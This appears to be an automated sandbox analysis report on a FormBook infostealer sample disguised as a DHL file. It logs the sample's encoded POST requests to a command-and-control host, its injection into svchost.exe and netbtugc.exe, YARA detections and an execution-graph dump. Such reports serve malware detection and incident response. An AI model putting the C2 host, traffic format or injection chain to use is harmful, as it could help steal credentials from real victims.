                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.549998217.196.55.202805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:51.385862112 CET812OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.empowermedeco.com
                                                                                          Origin: http://www.empowermedeco.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                          Data Ascii: UT5tTdKX=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                          Dec 19, 2024 07:53:52.582767010 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:52 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.549999217.196.55.202805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:54.038973093 CET1829OUTPOST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.empowermedeco.com
                                                                                          Origin: http://www.empowermedeco.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 [TRUNCATED]
                                                                                          Data Ascii: UT5tTdKX=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk [TRUNCATED]
                                                                                          Dec 19, 2024 07:53:55.243753910 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:55 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.550000217.196.55.202805956C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 07:53:56.698815107 CET526OUTGET /fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.empowermedeco.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Dec 19, 2024 07:53:57.895500898 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:57 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body><
                                                                                          Dec 19, 2024 07:53:57.895536900 CET7INData Raw: 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: /html>


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:01:50:01
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\DHL 0737-12182024.exe"
                                                                                          Imagebase:0x820000
                                                                                          File size:1'254'400 bytes
                                                                                          MD5 hash:EC3BA2F9B2D0B8236AC14326F17C2512
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:01:50:03
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\DHL 0737-12182024.exe"
                                                                                          Imagebase:0x5c0000
                                                                                          File size:46'504 bytes
                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:01:50:11
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe"
                                                                                          Imagebase:0xdc0000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:01:50:12
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                          Imagebase:0x1d0000
                                                                                          File size:22'016 bytes
                                                                                          MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:01:50:25
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe"
                                                                                          Imagebase:0xdc0000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:01:50:37
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff79f9e0000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:3%
                                                                                            Dynamic/Decrypted Code Coverage:1%
                                                                                            Signature Coverage:3.1%
                                                                                            Total number of Nodes:1827
                                                                                            Total number of Limit Nodes:46
                                                                                            execution_graph 96616 822de3 96617 822df0 __wsopen_s 96616->96617 96618 822e09 96617->96618 96620 862c2b ___scrt_fastfail 96617->96620 96632 823aa2 96618->96632 96622 862c47 GetOpenFileNameW 96620->96622 96624 862c96 96622->96624 96690 826b57 96624->96690 96627 862cab 96627->96627 96629 822e27 96660 8244a8 96629->96660 96702 861f50 96632->96702 96635 823ae9 96708 82a6c3 96635->96708 96636 823ace 96637 826b57 22 API calls 96636->96637 96639 823ada 96637->96639 96704 8237a0 96639->96704 96642 822da5 96643 861f50 __wsopen_s 96642->96643 96644 822db2 GetLongPathNameW 96643->96644 96645 826b57 22 API calls 96644->96645 96646 822dda 96645->96646 96647 823598 96646->96647 96759 82a961 96647->96759 96650 823aa2 23 API calls 96651 8235b5 96650->96651 96652 8235c0 96651->96652 96653 8632eb 96651->96653 96764 82515f 96652->96764 96659 86330d 96653->96659 96776 83ce60 41 API calls 96653->96776 96658 8235df 96658->96629 96777 824ecb 96660->96777 96663 863833 96799 892cf9 96663->96799 96665 824ecb 94 API calls 96667 8244e1 96665->96667 96666 863848 96668 86384c 96666->96668 96669 863869 96666->96669 96667->96663 96670 8244e9 96667->96670 96826 824f39 96668->96826 96672 83fe0b 22 API calls 96669->96672 96673 863854 96670->96673 96674 8244f5 96670->96674 96681 8638ae 96672->96681 96832 88da5a 82 API calls 96673->96832 96825 82940c 136 API calls 2 library calls 96674->96825 96677 863862 96677->96669 96678 822e31 96679 863a5f 96685 863a67 96679->96685 96680 824f39 68 API calls 96680->96685 96681->96679 96681->96685 96687 829cb3 22 API calls 96681->96687 96833 88967e 22 API calls __fread_nolock 96681->96833 96834 8895ad 42 API calls _wcslen 96681->96834 96835 890b5a 22 API calls 96681->96835 96836 82a4a1 22 API calls __fread_nolock 96681->96836 96837 823ff7 22 API calls 96681->96837 96685->96680 96838 88989b 82 API calls __wsopen_s 96685->96838 96687->96681 96691 864ba1 96690->96691 96693 826b67 _wcslen 96690->96693 96692 8293b2 22 API calls 96691->96692 96694 864baa 96692->96694 96695 826ba2 96693->96695 96696 826b7d 96693->96696 96694->96694 96697 83fddb 22 API calls 96695->96697 97277 826f34 22 API calls 96696->97277 96699 826bae 96697->96699 96701 83fe0b 22 API calls 96699->96701 96700 826b85 __fread_nolock 96700->96627 96701->96700 96703 823aaf GetFullPathNameW 96702->96703 96703->96635 96703->96636 96705 8237ae 96704->96705 96714 8293b2 96705->96714 96707 822e12 96707->96642 96709 82a6d0 96708->96709 96710 82a6dd 96708->96710 96709->96639 96711 83fddb 22 API calls 96710->96711 96712 82a6e7 96711->96712 96713 83fe0b 22 API calls 96712->96713 96713->96709 96715 8293c0 96714->96715 96717 8293c9 __fread_nolock 96714->96717 96715->96717 96718 82aec9 96715->96718 96717->96707 96719 82aed9 __fread_nolock 96718->96719 96720 82aedc 96718->96720 96719->96717 96724 83fddb 96720->96724 96722 82aee7 96734 83fe0b 96722->96734 96726 83fde0 96724->96726 96727 83fdfa 96726->96727 96730 83fdfc 96726->96730 96744 84ea0c 96726->96744 96751 844ead 7 API calls 2 library calls 96726->96751 96727->96722 96729 84066d 96753 8432a4 RaiseException 96729->96753 96730->96729 96752 8432a4 RaiseException 96730->96752 96733 84068a 96733->96722 96736 83fddb 96734->96736 96735 84ea0c ___std_exception_copy 21 API calls 96735->96736 96736->96735 96737 83fdfa 96736->96737 96740 83fdfc 96736->96740 96756 844ead 7 API calls 2 library calls 96736->96756 96737->96719 96739 84066d 96758 8432a4 RaiseException 96739->96758 96740->96739 96757 8432a4 RaiseException 96740->96757 96743 84068a 96743->96719 96750 853820 pre_c_initialization 96744->96750 96745 85385e 96755 84f2d9 20 API calls _abort 96745->96755 96746 853849 RtlAllocateHeap 96748 85385c 96746->96748 96746->96750 96748->96726 96750->96745 96750->96746 96754 844ead 7 API calls 2 library calls 96750->96754 96751->96726 96752->96729 96753->96733 96754->96750 96755->96748 96756->96736 96757->96739 96758->96743 96760 83fe0b 22 API calls 96759->96760 96761 82a976 96760->96761 96762 83fddb 22 API calls 96761->96762 96763 8235aa 96762->96763 96763->96650 96765 82516e 96764->96765 96769 82518f __fread_nolock 96764->96769 96767 83fe0b 22 API calls 96765->96767 96766 83fddb 22 API calls 96768 8235cc 96766->96768 96767->96769 96770 8235f3 96768->96770 96769->96766 96771 823624 __fread_nolock 96770->96771 